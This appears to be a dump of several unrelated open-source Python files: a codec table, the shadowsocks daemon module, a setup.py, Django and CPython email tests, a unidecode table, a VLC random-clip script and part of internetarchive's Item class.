u'\u010c' # 0xC8 -> LATIN CAPITAL LETTER C WITH CARON
u'\xc9' # 0xC9 -> LATIN CAPITAL LETTER E WITH ACUTE
u'\u0179' # 0xCA -> LATIN CAPITAL LETTER Z WITH ACUTE
u'\u0116' # 0xCB -> LATIN CAPITAL LETTER E WITH DOT ABOVE
u'\u0122' # 0xCC -> LATIN CAPITAL LETTER G WITH CEDILLA
u'\u0136' # 0xCD -> LATIN CAPITAL LETTER K WITH CEDILLA
u'\u012a' # 0xCE -> LATIN CAPITAL LETTER I WITH MACRON
u'\u013b' # 0xCF -> LATIN CAPITAL LETTER L WITH CEDILLA
u'\u0160' # 0xD0 -> LATIN CAPITAL LETTER S WITH CARON
u'\u0143' # 0xD1 -> LATIN CAPITAL LETTER N WITH ACUTE
u'\u0145' # 0xD2 -> LATIN CAPITAL LETTER N WITH CEDILLA
u'\xd3' # 0xD3 -> LATIN CAPITAL LETTER O WITH ACUTE
u'\u014c' # 0xD4 -> LATIN CAPITAL LETTER O WITH MACRON
u'\xd5' # 0xD5 -> LATIN CAPITAL LETTER O WITH TILDE
u'\xd6' # 0xD6 -> LATIN CAPITAL LETTER O WITH DIAERESIS
u'\xd7' # 0xD7 -> MULTIPLICATION SIGN
u'\u0172' # 0xD8 -> LATIN CAPITAL LETTER U WITH OGONEK
u'\u0141' # 0xD9 -> LATIN CAPITAL LETTER L WITH STROKE
u'\u015a' # 0xDA -> LATIN CAPITAL LETTER S WITH ACUTE
u'\u016a' # 0xDB -> LATIN CAPITAL LETTER U WITH MACRON
u'\xdc' # 0xDC -> LATIN CAPITAL LETTER U WITH DIAERESIS
u'\u017b' # 0xDD -> LATIN CAPITAL LETTER Z WITH DOT ABOVE
u'\u017d' # 0xDE -> LATIN CAPITAL LETTER Z WITH CARON
u'\xdf' # 0xDF -> LATIN SMALL LETTER SHARP S
u'\u0105' # 0xE0 -> LATIN SMALL LETTER A WITH OGONEK
u'\u012f' # 0xE1 -> LATIN SMALL LETTER I WITH OGONEK
u'\u0101' # 0xE2 -> LATIN SMALL LETTER A WITH MACRON
u'\u0107' # 0xE3 -> LATIN SMALL LETTER C WITH ACUTE
u'\xe4' # 0xE4 -> LATIN SMALL LETTER A WITH DIAERESIS
u'\xe5' # 0xE5 -> LATIN SMALL LETTER A WITH RING ABOVE
u'\u0119' # 0xE6 -> LATIN SMALL LETTER E WITH OGONEK
u'\u0113' # 0xE7 -> LATIN SMALL LETTER E WITH MACRON
u'\u010d' # 0xE8 -> LATIN SMALL LETTER C WITH CARON
u'\xe9' # 0xE9 -> LATIN SMALL LETTER E WITH ACUTE
u'\u017a' # 0xEA -> LATIN SMALL LETTER Z WITH ACUTE
u'\u0117' # 0xEB -> LATIN SMALL LETTER E WITH DOT ABOVE
u'\u0123' # 0xEC -> LATIN SMALL LETTER G WITH CEDILLA
u'\u0137' # 0xED -> LATIN SMALL LETTER K WITH CEDILLA
u'\u012b' # 0xEE -> LATIN SMALL LETTER I WITH MACRON
u'\u013c' # 0xEF -> LATIN SMALL LETTER L WITH CEDILLA
u'\u0161' # 0xF0 -> LATIN SMALL LETTER S WITH CARON
u'\u0144' # 0xF1 -> LATIN SMALL LETTER N WITH ACUTE
u'\u0146' # 0xF2 -> LATIN SMALL LETTER N WITH CEDILLA
u'\xf3' # 0xF3 -> LATIN SMALL LETTER O WITH ACUTE
u'\u014d' # 0xF4 -> LATIN SMALL LETTER O WITH MACRON
u'\xf5' # 0xF5 -> LATIN SMALL LETTER O WITH TILDE
u'\xf6' # 0xF6 -> LATIN SMALL LETTER O WITH DIAERESIS
u'\xf7' # 0xF7 -> DIVISION SIGN
u'\u0173' # 0xF8 -> LATIN SMALL LETTER U WITH OGONEK
u'\u0142' # 0xF9 -> LATIN SMALL LETTER L WITH STROKE
u'\u015b' # 0xFA -> LATIN SMALL LETTER S WITH ACUTE
u'\u016b' # 0xFB -> LATIN SMALL LETTER U WITH MACRON
u'\xfc' # 0xFC -> LATIN SMALL LETTER U WITH DIAERESIS
u'\u017c' # 0xFD -> LATIN SMALL LETTER Z WITH DOT ABOVE
u'\u017e' # 0xFE -> LATIN SMALL LETTER Z WITH CARON
u'\u02d9' # 0xFF -> DOT ABOVE
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
| gpl-3.0 |
icetoggle/shadowsocks | shadowsocks/daemon.py | 694 | 5602 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2014-2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import os
import sys
import logging
import signal
import time
from shadowsocks import common, shell
# this module is ported from ShadowVPN daemon.c
def daemon_exec(config):
if 'daemon' in config:
if os.name != 'posix':
raise Exception('daemon mode is only supported on Unix')
command = config['daemon']
if not command:
command = 'start'
pid_file = config['pid-file']
log_file = config['log-file']
if command == 'start':
daemon_start(pid_file, log_file)
elif command == 'stop':
daemon_stop(pid_file)
# always exit after daemon_stop
sys.exit(0)
elif command == 'restart':
daemon_stop(pid_file)
daemon_start(pid_file, log_file)
else:
raise Exception('unsupported daemon command %s' % command)
def write_pid_file(pid_file, pid):
import fcntl
import stat
try:
fd = os.open(pid_file, os.O_RDWR | os.O_CREAT,
stat.S_IRUSR | stat.S_IWUSR)
except OSError as e:
shell.print_exception(e)
return -1
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
assert flags != -1
flags |= fcntl.FD_CLOEXEC
r = fcntl.fcntl(fd, fcntl.F_SETFD, flags)
assert r != -1
# There is no platform independent way to implement fcntl(fd, F_SETLK, &fl)
# via fcntl.fcntl. So use lockf instead
try:
fcntl.lockf(fd, fcntl.LOCK_EX | fcntl.LOCK_NB, 0, 0, os.SEEK_SET)
except IOError:
r = os.read(fd, 32)
if r:
logging.error('already started at pid %s' % common.to_str(r))
else:
logging.error('already started')
os.close(fd)
return -1
os.ftruncate(fd, 0)
os.write(fd, common.to_bytes(str(pid)))
return 0
def freopen(f, mode, stream):
oldf = open(f, mode)
oldfd = oldf.fileno()
newfd = stream.fileno()
os.close(newfd)
os.dup2(oldfd, newfd)
def daemon_start(pid_file, log_file):
def handle_exit(signum, _):
if signum == signal.SIGTERM:
sys.exit(0)
sys.exit(1)
signal.signal(signal.SIGINT, handle_exit)
signal.signal(signal.SIGTERM, handle_exit)
# fork only once because we are sure parent will exit
pid = os.fork()
assert pid != -1
if pid > 0:
# parent waits for its child
time.sleep(5)
sys.exit(0)
# child signals its parent to exit
ppid = os.getppid()
pid = os.getpid()
if write_pid_file(pid_file, pid) != 0:
os.kill(ppid, signal.SIGINT)
sys.exit(1)
os.setsid()
signal.signal(signal.SIGHUP, signal.SIG_IGN)
print('started')
os.kill(ppid, signal.SIGTERM)
sys.stdin.close()
try:
freopen(log_file, 'a', sys.stdout)
freopen(log_file, 'a', sys.stderr)
except IOError as e:
shell.print_exception(e)
sys.exit(1)
def daemon_stop(pid_file):
import errno
try:
with open(pid_file) as f:
buf = f.read()
pid = common.to_str(buf)
if not buf:
logging.error('not running')
except IOError as e:
shell.print_exception(e)
if e.errno == errno.ENOENT:
# always exit 0 if we are sure daemon is not running
logging.error('not running')
return
sys.exit(1)
pid = int(pid)
if pid > 0:
try:
os.kill(pid, signal.SIGTERM)
except OSError as e:
if e.errno == errno.ESRCH:
logging.error('not running')
# always exit 0 if we are sure daemon is not running
return
shell.print_exception(e)
sys.exit(1)
else:
logging.error('pid is not positive: %d', pid)
# sleep for maximum 10s
for i in range(0, 200):
try:
# query for the pid
os.kill(pid, 0)
except OSError as e:
if e.errno == errno.ESRCH:
break
time.sleep(0.05)
else:
logging.error('timed out when stopping pid %d', pid)
sys.exit(1)
print('stopped')
os.unlink(pid_file)
def set_user(username):
if username is None:
return
import pwd
import grp
try:
pwrec = pwd.getpwnam(username)
except KeyError:
logging.error('user not found: %s' % username)
raise
user = pwrec[0]
uid = pwrec[2]
gid = pwrec[3]
cur_uid = os.getuid()
if uid == cur_uid:
return
if cur_uid != 0:
logging.error('can not set user as nonroot user')
# will raise later
# inspired by supervisor
if hasattr(os, 'setgroups'):
groups = [grprec[2] for grprec in grp.getgrall() if user in grprec[3]]
groups.insert(0, gid)
os.setgroups(groups)
os.setgid(gid)
os.setuid(uid)
| apache-2.0 |
jmbarbier/rst2code | setup.py | 1 | 1112 | import os
from distutils.core import setup
from setuptools import find_packages
with open('version.py') as f: exec(f.read())
CLASSIFIERS = [
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Documentation',
'Topic :: Software Development',
'Topic :: Text Processing :: Markup'
]
INSTALL_REQUIRES = [
"Pygments>=1.6",
"Sphinx>=1.1.3",
"docutils>=0.11"
]
setup(
name = "rst2code",
description = "reStructuredText literate programming tool",
classifiers = CLASSIFIERS,
install_requires = INSTALL_REQUIRES,
version = __version__,
author = "Jean-Matthieu BARBIER",
author_email = "jm.barbier@solidev.net",
url="https://github.com/jmbarbier/rst2code",
download_url="https://github.com/jmbarbier/rst2code/archive/v"+__version__+".tar.gz",
py_modules = ["rst2code", "version"],
scripts = ["rst2code.py"]
)
| gpl-3.0 |
ABaldwinHunter/django-clone-classic | tests/utils_tests/test_decorators.py | 319 | 4870 | from django.http import HttpResponse
from django.template import engines
from django.template.response import TemplateResponse
from django.test import RequestFactory, SimpleTestCase
from django.utils.decorators import classproperty, decorator_from_middleware
class ProcessViewMiddleware(object):
def process_view(self, request, view_func, view_args, view_kwargs):
pass
process_view_dec = decorator_from_middleware(ProcessViewMiddleware)
@process_view_dec
def process_view(request):
return HttpResponse()
class ClassProcessView(object):
def __call__(self, request):
return HttpResponse()
class_process_view = process_view_dec(ClassProcessView())
class FullMiddleware(object):
def process_request(self, request):
request.process_request_reached = True
def process_view(self, request, view_func, view_args, view_kwargs):
request.process_view_reached = True
def process_template_response(self, request, response):
request.process_template_response_reached = True
return response
def process_response(self, request, response):
# This should never receive unrendered content.
request.process_response_content = response.content
request.process_response_reached = True
return response
full_dec = decorator_from_middleware(FullMiddleware)
class DecoratorFromMiddlewareTests(SimpleTestCase):
"""
Tests for view decorators created using
``django.utils.decorators.decorator_from_middleware``.
"""
rf = RequestFactory()
def test_process_view_middleware(self):
"""
Test a middleware that implements process_view.
"""
process_view(self.rf.get('/'))
def test_callable_process_view_middleware(self):
"""
Test a middleware that implements process_view, operating on a callable class.
"""
class_process_view(self.rf.get('/'))
def test_full_dec_normal(self):
"""
Test that all methods of middleware are called for normal HttpResponses
"""
@full_dec
def normal_view(request):
template = engines['django'].from_string("Hello world")
return HttpResponse(template.render())
request = self.rf.get('/')
normal_view(request)
self.assertTrue(getattr(request, 'process_request_reached', False))
self.assertTrue(getattr(request, 'process_view_reached', False))
# process_template_response must not be called for HttpResponse
self.assertFalse(getattr(request, 'process_template_response_reached', False))
self.assertTrue(getattr(request, 'process_response_reached', False))
def test_full_dec_templateresponse(self):
"""
Test that all methods of middleware are called for TemplateResponses in
the right sequence.
"""
@full_dec
def template_response_view(request):
template = engines['django'].from_string("Hello world")
return TemplateResponse(request, template)
request = self.rf.get('/')
response = template_response_view(request)
self.assertTrue(getattr(request, 'process_request_reached', False))
self.assertTrue(getattr(request, 'process_view_reached', False))
self.assertTrue(getattr(request, 'process_template_response_reached', False))
# response must not be rendered yet.
self.assertFalse(response._is_rendered)
# process_response must not be called until after response is rendered,
# otherwise some decorators like csrf_protect and gzip_page will not
# work correctly. See #16004
self.assertFalse(getattr(request, 'process_response_reached', False))
response.render()
self.assertTrue(getattr(request, 'process_response_reached', False))
# Check that process_response saw the rendered content
self.assertEqual(request.process_response_content, b"Hello world")
class ClassPropertyTest(SimpleTestCase):
def test_getter(self):
class Foo(object):
foo_attr = 123
def __init__(self):
self.foo_attr = 456
@classproperty
def foo(cls):
return cls.foo_attr
class Bar(object):
bar = classproperty()
@bar.getter
def bar(cls):
return 123
self.assertEqual(Foo.foo, 123)
self.assertEqual(Foo().foo, 123)
self.assertEqual(Bar.bar, 123)
self.assertEqual(Bar().bar, 123)
def test_override_getter(self):
class Foo(object):
@classproperty
def foo(cls):
return 123
@foo.getter
def foo(cls):
return 456
self.assertEqual(Foo.foo, 456)
self.assertEqual(Foo().foo, 456)
| bsd-3-clause |
mancoast/CPythonPyc_test | fail/340_test_generator.py | 118 | 7616 | import io
import textwrap
import unittest
from email import message_from_string, message_from_bytes
from email.generator import Generator, BytesGenerator
from email import policy
from test.test_email import TestEmailBase, parameterize
@parameterize
class TestGeneratorBase:
policy = policy.default
def msgmaker(self, msg, policy=None):
policy = self.policy if policy is None else policy
return self.msgfunc(msg, policy=policy)
refold_long_expected = {
0: textwrap.dedent("""\
To: whom_it_may_concern@example.com
From: nobody_you_want_to_know@example.com
Subject: We the willing led by the unknowing are doing the
impossible for the ungrateful. We have done so much for so long with so little
we are now qualified to do anything with nothing.
None
"""),
# From is wrapped because wrapped it fits in 40.
40: textwrap.dedent("""\
To: whom_it_may_concern@example.com
From:
nobody_you_want_to_know@example.com
Subject: We the willing led by the
unknowing are doing the impossible for
the ungrateful. We have done so much
for so long with so little we are now
qualified to do anything with nothing.
None
"""),
# Neither to nor from fit even if put on a new line,
# so we leave them sticking out on the first line.
20: textwrap.dedent("""\
To: whom_it_may_concern@example.com
From: nobody_you_want_to_know@example.com
Subject: We the
willing led by the
unknowing are doing
the impossible for
the ungrateful. We
have done so much
for so long with so
little we are now
qualified to do
anything with
nothing.
None
"""),
}
refold_long_expected[100] = refold_long_expected[0]
refold_all_expected = refold_long_expected.copy()
refold_all_expected[0] = (
"To: whom_it_may_concern@example.com\n"
"From: nobody_you_want_to_know@example.com\n"
"Subject: We the willing led by the unknowing are doing the "
"impossible for the ungrateful. We have done so much for "
"so long with so little we are now qualified to do anything "
"with nothing.\n"
"\n"
"None\n")
refold_all_expected[100] = (
"To: whom_it_may_concern@example.com\n"
"From: nobody_you_want_to_know@example.com\n"
"Subject: We the willing led by the unknowing are doing the "
"impossible for the ungrateful. We have\n"
" done so much for so long with so little we are now qualified "
"to do anything with nothing.\n"
"\n"
"None\n")
length_params = [n for n in refold_long_expected]
def length_as_maxheaderlen_parameter(self, n):
msg = self.msgmaker(self.typ(self.refold_long_expected[0]))
s = self.ioclass()
g = self.genclass(s, maxheaderlen=n, policy=self.policy)
g.flatten(msg)
self.assertEqual(s.getvalue(), self.typ(self.refold_long_expected[n]))
def length_as_max_line_length_policy(self, n):
msg = self.msgmaker(self.typ(self.refold_long_expected[0]))
s = self.ioclass()
g = self.genclass(s, policy=self.policy.clone(max_line_length=n))
g.flatten(msg)
self.assertEqual(s.getvalue(), self.typ(self.refold_long_expected[n]))
def length_as_maxheaderlen_parm_overrides_policy(self, n):
msg = self.msgmaker(self.typ(self.refold_long_expected[0]))
s = self.ioclass()
g = self.genclass(s, maxheaderlen=n,
policy=self.policy.clone(max_line_length=10))
g.flatten(msg)
self.assertEqual(s.getvalue(), self.typ(self.refold_long_expected[n]))
def length_as_max_line_length_with_refold_none_does_not_fold(self, n):
msg = self.msgmaker(self.typ(self.refold_long_expected[0]))
s = self.ioclass()
g = self.genclass(s, policy=self.policy.clone(refold_source='none',
max_line_length=n))
g.flatten(msg)
self.assertEqual(s.getvalue(), self.typ(self.refold_long_expected[0]))
def length_as_max_line_length_with_refold_all_folds(self, n):
msg = self.msgmaker(self.typ(self.refold_long_expected[0]))
s = self.ioclass()
g = self.genclass(s, policy=self.policy.clone(refold_source='all',
max_line_length=n))
g.flatten(msg)
self.assertEqual(s.getvalue(), self.typ(self.refold_all_expected[n]))
def test_crlf_control_via_policy(self):
source = "Subject: test\r\n\r\ntest body\r\n"
expected = source
msg = self.msgmaker(self.typ(source))
s = self.ioclass()
g = self.genclass(s, policy=policy.SMTP)
g.flatten(msg)
self.assertEqual(s.getvalue(), self.typ(expected))
def test_flatten_linesep_overrides_policy(self):
source = "Subject: test\n\ntest body\n"
expected = source
msg = self.msgmaker(self.typ(source))
s = self.ioclass()
g = self.genclass(s, policy=policy.SMTP)
g.flatten(msg, linesep='\n')
self.assertEqual(s.getvalue(), self.typ(expected))
class TestGenerator(TestGeneratorBase, TestEmailBase):
msgfunc = staticmethod(message_from_string)
genclass = Generator
ioclass = io.StringIO
typ = str
class TestBytesGenerator(TestGeneratorBase, TestEmailBase):
msgfunc = staticmethod(message_from_bytes)
genclass = BytesGenerator
ioclass = io.BytesIO
typ = lambda self, x: x.encode('ascii')
def test_cte_type_7bit_handles_unknown_8bit(self):
source = ("Subject: Maintenant je vous présente mon "
"collègue\n\n").encode('utf-8')
expected = ('Subject: Maintenant je vous =?unknown-8bit?q?'
'pr=C3=A9sente_mon_coll=C3=A8gue?=\n\n').encode('ascii')
msg = message_from_bytes(source)
s = io.BytesIO()
g = BytesGenerator(s, policy=self.policy.clone(cte_type='7bit'))
g.flatten(msg)
self.assertEqual(s.getvalue(), expected)
def test_cte_type_7bit_transforms_8bit_cte(self):
source = textwrap.dedent("""\
From: foo@bar.com
To: Dinsdale
Subject: Nudge nudge, wink, wink
Mime-Version: 1.0
Content-Type: text/plain; charset="latin-1"
Content-Transfer-Encoding: 8bit
oh là là, know what I mean, know what I mean?
""").encode('latin1')
msg = message_from_bytes(source)
expected = textwrap.dedent("""\
From: foo@bar.com
To: Dinsdale
Subject: Nudge nudge, wink, wink
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
oh l=E0 l=E0, know what I mean, know what I mean?
""").encode('ascii')
s = io.BytesIO()
g = BytesGenerator(s, policy=self.policy.clone(cte_type='7bit',
linesep='\n'))
g.flatten(msg)
self.assertEqual(s.getvalue(), expected)
if __name__ == '__main__':
unittest.main()
| gpl-3.0 |
mnahm5/django-estore | Lib/site-packages/unidecode/x021.py | 62 | 3964 | data = (
'', # 0x00
'', # 0x01
'C', # 0x02
'', # 0x03
'', # 0x04
'', # 0x05
'', # 0x06
'', # 0x07
'', # 0x08
'', # 0x09
'', # 0x0a
'', # 0x0b
'', # 0x0c
'H', # 0x0d
'', # 0x0e
'', # 0x0f
'', # 0x10
'', # 0x11
'', # 0x12
'', # 0x13
'', # 0x14
'N', # 0x15
'', # 0x16
'', # 0x17
'', # 0x18
'P', # 0x19
'Q', # 0x1a
'', # 0x1b
'', # 0x1c
'R', # 0x1d
'', # 0x1e
'', # 0x1f
'(sm)', # 0x20
'TEL', # 0x21
'(tm)', # 0x22
'', # 0x23
'Z', # 0x24
'', # 0x25
'', # 0x26
'', # 0x27
'', # 0x28
'', # 0x29
'K', # 0x2a
'A', # 0x2b
'', # 0x2c
'', # 0x2d
'e', # 0x2e
'e', # 0x2f
'E', # 0x30
'F', # 0x31
'F', # 0x32
'M', # 0x33
'', # 0x34
'', # 0x35
'', # 0x36
'', # 0x37
'', # 0x38
'', # 0x39
'', # 0x3a
'FAX', # 0x3b
'', # 0x3c
'', # 0x3d
'', # 0x3e
'', # 0x3f
'[?]', # 0x40
'[?]', # 0x41
'[?]', # 0x42
'[?]', # 0x43
'[?]', # 0x44
'D', # 0x45
'd', # 0x46
'e', # 0x47
'i', # 0x48
'j', # 0x49
'[?]', # 0x4a
'[?]', # 0x4b
'[?]', # 0x4c
'[?]', # 0x4d
'F', # 0x4e
'[?]', # 0x4f
'[?]', # 0x50
'[?]', # 0x51
'[?]', # 0x52
' 1/3 ', # 0x53
' 2/3 ', # 0x54
' 1/5 ', # 0x55
' 2/5 ', # 0x56
' 3/5 ', # 0x57
' 4/5 ', # 0x58
' 1/6 ', # 0x59
' 5/6 ', # 0x5a
' 1/8 ', # 0x5b
' 3/8 ', # 0x5c
' 5/8 ', # 0x5d
' 7/8 ', # 0x5e
' 1/', # 0x5f
'I', # 0x60
'II', # 0x61
'III', # 0x62
'IV', # 0x63
'V', # 0x64
'VI', # 0x65
'VII', # 0x66
'VIII', # 0x67
'IX', # 0x68
'X', # 0x69
'XI', # 0x6a
'XII', # 0x6b
'L', # 0x6c
'C', # 0x6d
'D', # 0x6e
'M', # 0x6f
'i', # 0x70
'ii', # 0x71
'iii', # 0x72
'iv', # 0x73
'v', # 0x74
'vi', # 0x75
'vii', # 0x76
'viii', # 0x77
'ix', # 0x78
'x', # 0x79
'xi', # 0x7a
'xii', # 0x7b
'l', # 0x7c
'c', # 0x7d
'd', # 0x7e
'm', # 0x7f
'(D', # 0x80
'D)', # 0x81
'((|))', # 0x82
')', # 0x83
'[?]', # 0x84
'[?]', # 0x85
'[?]', # 0x86
'[?]', # 0x87
'[?]', # 0x88
'[?]', # 0x89
'[?]', # 0x8a
'[?]', # 0x8b
'[?]', # 0x8c
'[?]', # 0x8d
'[?]', # 0x8e
'[?]', # 0x8f
'-', # 0x90
'|', # 0x91
'-', # 0x92
'|', # 0x93
'-', # 0x94
'|', # 0x95
'\\', # 0x96
'/', # 0x97
'\\', # 0x98
'/', # 0x99
'-', # 0x9a
'-', # 0x9b
'~', # 0x9c
'~', # 0x9d
'-', # 0x9e
'|', # 0x9f
'-', # 0xa0
'|', # 0xa1
'-', # 0xa2
'-', # 0xa3
'-', # 0xa4
'|', # 0xa5
'-', # 0xa6
'|', # 0xa7
'|', # 0xa8
'-', # 0xa9
'-', # 0xaa
'-', # 0xab
'-', # 0xac
'-', # 0xad
'-', # 0xae
'|', # 0xaf
'|', # 0xb0
'|', # 0xb1
'|', # 0xb2
'|', # 0xb3
'|', # 0xb4
'|', # 0xb5
'^', # 0xb6
'V', # 0xb7
'\\', # 0xb8
'=', # 0xb9
'V', # 0xba
'^', # 0xbb
'-', # 0xbc
'-', # 0xbd
'|', # 0xbe
'|', # 0xbf
'-', # 0xc0
'-', # 0xc1
'|', # 0xc2
'|', # 0xc3
'=', # 0xc4
'|', # 0xc5
'=', # 0xc6
'=', # 0xc7
'|', # 0xc8
'=', # 0xc9
'|', # 0xca
'=', # 0xcb
'=', # 0xcc
'=', # 0xcd
'=', # 0xce
'=', # 0xcf
'=', # 0xd0
'|', # 0xd1
'=', # 0xd2
'|', # 0xd3
'=', # 0xd4
'|', # 0xd5
'\\', # 0xd6
'/', # 0xd7
'\\', # 0xd8
'/', # 0xd9
'=', # 0xda
'=', # 0xdb
'~', # 0xdc
'~', # 0xdd
'|', # 0xde
'|', # 0xdf
'-', # 0xe0
'|', # 0xe1
'-', # 0xe2
'|', # 0xe3
'-', # 0xe4
'-', # 0xe5
'-', # 0xe6
'|', # 0xe7
'-', # 0xe8
'|', # 0xe9
'|', # 0xea
'|', # 0xeb
'|', # 0xec
'|', # 0xed
'|', # 0xee
'|', # 0xef
'-', # 0xf0
'\\', # 0xf1
'\\', # 0xf2
'|', # 0xf3
'[?]', # 0xf4
'[?]', # 0xf5
'[?]', # 0xf6
'[?]', # 0xf7
'[?]', # 0xf8
'[?]', # 0xf9
'[?]', # 0xfa
'[?]', # 0xfb
'[?]', # 0xfc
'[?]', # 0xfd
'[?]', # 0xfe
)
| mit |
niknow/vlc-random-videoclip | party.py | 1 | 1431 | import random
import time
import subprocess
import vlc
import os
# create list of all videos in folder 'videos'
subfolder = "videos"
videos = os.listdir(subfolder)
# specify clip length
intervall = 3 # seconds
# setup vlc instance
player = vlc.MediaPlayer()
try:
print("Script running... press Ctrl+C to quit.")
while True:
# choose random file number
n = random.randint(0, len(videos) - 1)
# create path to current video file
video = os.path.join(subfolder, videos[n])
# get length of video n using ffprobe
ffprobe = subprocess.check_output(['ffprobe', video],
shell=True,
stderr=subprocess.STDOUT)
# calculate length of current video in seconds
i = ffprobe.find(bytes("Duration:", 'UTF-8'))
duration = ffprobe[i + 9:i + 9 + 12].decode('UTF-8').strip().split(":")
length = int(int(duration[0]) * 3600 +
int(duration[1]) * 60 +
float(duration[2])
)
# create random position in video n
position = random.randint(0, length - intervall)
# feed player with video and position
player.set_mrl(video)
player.play()
player.set_time(position * 1000)
# wait till next video
time.sleep(intervall)
except KeyboardInterrupt:
pass
| mit |
wumpus/internetarchive | internetarchive/item.py | 1 | 32339 | import os
import sys
from fnmatch import fnmatch
import logging
import time
from datetime import datetime
import requests.sessions
from requests.adapters import HTTPAdapter
from requests.exceptions import HTTPError
from requests import Response
from clint.textui import progress
import six
import six.moves.urllib as urllib
from . import __version__, session, iarequest, utils
log = logging.getLogger(__name__)
# Item class
# ________________________________________________________________________________________
class Item(object):
"""This class represents an archive.org item. You can use this
class to access item metadata::
>>> import internetarchive
>>> item = internetarchive.Item('stairs')
>>> print(item.metadata)
Or to modify the metadata for an item::
>>> metadata = dict(title='The Stairs')
>>> item.modify(metadata)
>>> print(item.metadata['title'])
u'The Stairs'
This class also uses IA's S3-like interface to upload files to an
item. You need to supply your IAS3 credentials in environment
variables in order to upload::
>>> item.upload('myfile.tar', access_key='Y6oUrAcCEs4sK8ey',
... secret_key='youRSECRETKEYzZzZ')
True
You can retrieve S3 keys here: `https://archive.org/account/s3.php
<https://archive.org/account/s3.php>`__
"""
# init()
# ____________________________________________________________________________________
def __init__(self, identifier, metadata_timeout=None, config=None, max_retries=1,
archive_session=None):
"""
:type identifier: str
:param identifier: The globally unique Archive.org identifier
for a given item.
:type metadata_timeout: int
:param metadata_timeout: (optional) Set a timeout for retrieving
an item's metadata.
:type config: dict
:param secure: (optional) Configuration options for session.
:type max_retries: int
:param max_retries: (optional) Maximum number of times to request
a website if the connection drops. (default: 1)
:type archive_session: :class:`ArchiveSession <ArchiveSession>`
:param archive_session: An :class:`ArchiveSession <ArchiveSession>`
object can be provided via the `archive_session`
parameter.
"""
self.session = archive_session if archive_session else session.get_session(config)
self.protocol = 'https:' if self.session.secure else 'http:'
self.http_session = requests.sessions.Session()
max_retries_adapter = HTTPAdapter(max_retries=max_retries)
self.http_session.mount('{0}//'.format(self.protocol), max_retries_adapter)
self.http_session.cookies = self.session.cookies
self.identifier = identifier
# Default empty attributes.
self.metadata = {}
self.files = []
self.created = None
self.d1 = None
self.d2 = None
self.dir = None
self.files_count = None
self.item_size = None
self.reviews = []
self.server = None
self.uniq = None
self.updated = None
self.tasks = None
self._json = self.get_metadata(metadata_timeout)
self.exists = False if self._json == {} else True
# __repr__()
# ____________________________________________________________________________________
def __repr__(self):
return ('Item(identifier={identifier!r}, '
'exists={exists!r})'.format(**self.__dict__))
# get_metadata()
# ____________________________________________________________________________________
def get_metadata(self, metadata_timeout=None):
"""Get an item's metadata from the `Metadata API
<http://blog.archive.org/2013/07/04/metadata-api/>`__
:type identifier: str
:param identifier: Globally unique Archive.org identifier.
:rtype: dict
:returns: Metadat API response.
"""
url = '{protocol}//archive.org/metadata/{identifier}'.format(**self.__dict__)
try:
resp = self.http_session.get(url, timeout=metadata_timeout)
resp.raise_for_status()
except HTTPError as e:
error_msg = 'Error retrieving metadata from {0}, {1}'.format(resp.url, e)
log.error(error_msg)
if e.response.status_code == 503:
time.sleep(2.0)
raise HTTPError(error_msg)
metadata = resp.json()
for key in metadata:
setattr(self, key, metadata[key])
return metadata
# iter_files()
# ____________________________________________________________________________________
def iter_files(self):
"""Generator for iterating over files in an item.
:rtype: generator
:returns: A generator that yields :class:`internetarchive.File
<File>` objects.
"""
for file_dict in self.files:
file = File(self, file_dict.get('name'))
yield file
# file()
# ____________________________________________________________________________________
def get_file(self, file_name):
"""Get a :class:`File <File>` object for the named file.
:rtype: :class:`internetarchive.File <File>`
:returns: An :class:`internetarchive.File <File>` object.
"""
for f in self.iter_files():
if f.name == file_name:
return f
# get_files()
# ____________________________________________________________________________________
def get_files(self, files=None, source=None, formats=None, glob_pattern=None):
files = [] if not files else files
source = [] if not source else source
if not isinstance(files, (list, tuple, set)):
files = [files]
if not isinstance(source, (list, tuple, set)):
source = [source]
if not isinstance(formats, (list, tuple, set)):
formats = [formats]
file_objects = []
for f in self.iter_files():
if f.name in files:
file_objects.append(f)
elif f.source in source:
file_objects.append(f)
elif f.format in formats:
file_objects.append(f)
elif glob_pattern:
# Support for | operator.
patterns = glob_pattern.split('|')
if not isinstance(patterns, list):
patterns = [patterns]
for p in patterns:
if fnmatch(f.name, p):
file_objects.append(f)
return file_objects
# download()
# ____________________________________________________________________________________
def download(self, concurrent=None, source=None, formats=None, glob_pattern=None,
dry_run=None, verbose=None, ignore_existing=None, checksum=None,
destdir=None, no_directory=None):
"""Download the entire item into the current working directory.
:type concurrent: bool
:param concurrent: Download files concurrently if ``True``.
:type source: str
:param source: Only download files matching given source.
:type formats: str
:param formats: Only download files matching the given Formats.
:type glob_pattern: str
:param glob_pattern: Only download files matching the given glob
pattern
:type ignore_existing: bool
:param ignore_existing: Overwrite local files if they already
exist.
:type checksum: bool
:param checksum: Skip downloading file based on checksum.
:type no_directory: bool
:param no_directory: Download files to current working
directory rather than creating an item
directory.
:rtype: bool
:returns: True if if files have been downloaded successfully.
"""
concurrent = False if concurrent is None else concurrent
dry_run = False if dry_run is None else dry_run
verbose = False if verbose is None else verbose
ignore_existing = False if ignore_existing is None else ignore_existing
checksum = False if checksum is None else checksum
no_directory = False if no_directory is None else no_directory
if verbose:
sys.stdout.write('{0}:\n'.format(self.identifier))
if self._json.get('is_dark') is True:
sys.stdout.write(' skipping: item is dark.\n')
log.warning('Not downloading item {0}, '
'item is dark'.format(self.identifier))
elif self.metadata == {}:
sys.stdout.write(' skipping: item does not exist.\n')
log.warning('Not downloading item {0}, '
'item does not exist.'.format(self.identifier))
if concurrent:
try:
from gevent import monkey
